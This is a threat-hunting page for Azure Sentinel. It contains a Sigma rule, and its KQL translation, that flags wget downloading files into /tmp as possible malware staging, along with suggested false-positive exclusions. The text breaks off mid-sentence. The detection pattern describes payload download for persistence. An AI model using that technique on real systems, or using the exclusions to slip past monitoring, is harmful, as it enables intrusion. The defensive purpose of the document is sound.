Adversaries may use wget to download malicious files into suspicious directories to establish persistence or execute payloads. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential command and control or data exfiltration activities early.
Detection Rule
title: Download File To Potentially Suspicious Directory Via Wget
id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4
status: test
description: Detects the use of wget to download content to a suspicious directory
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/wget'
selection_output:
- CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection
- CommandLine|contains: '--output-document'
selection_path:
CommandLine|contains: '/tmp/'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
imProcessCreate
| where TargetProcessName endswith "/wget" and (TargetProcessCommandLine matches regex "\\s-O\\s" or TargetProcessCommandLine contains "--output-document") and TargetProcessCommandLine contains "/tmp/"Scenario: System Update via Wget
Description: A system administrator uses wget to download a critical system update package to a temporary directory before installing it.
Filter/Exclusion: Exclude wget commands where the destination directory is /tmp or /var/tmp and the URL matches a known update server (e.g., https://updates.example.com).
Scenario: Scheduled Job for Data Backup
Description: A scheduled job uses wget to fetch a backup file from an internal server to a directory used for temporary storage during the backup process.
Filter/Exclusion: Exclude wget commands executed by the backup user or cron jobs with a specific job name (e.g., backup_job) and destination directory /var/backups.
Scenario: Admin Task for Configuration Sync
Description: An admin uses wget to download a configuration file from a central configuration management server to a directory used for staging changes before applying them.
Filter/Exclusion: Exclude wget commands executed by the admin user or with a destination directory /opt/config-staging and URL matching a known config server (e.g., https://config.example.com).
Scenario: Log File Aggregation
Description: A log aggregation tool uses wget to download log files from a remote server to a temporary directory for processing.
Filter/Exclusion: Exclude wget commands where the destination directory is /var/log/aggregate and the URL is from a known internal log server (e.g., http://logserver.example.com).
Scenario: Software Development Build Process
Description: A CI/CD pipeline uses wget to download a dependency or artifact to a build directory during the compilation process.
Filter/Exclusion: Exclude wget commands executed by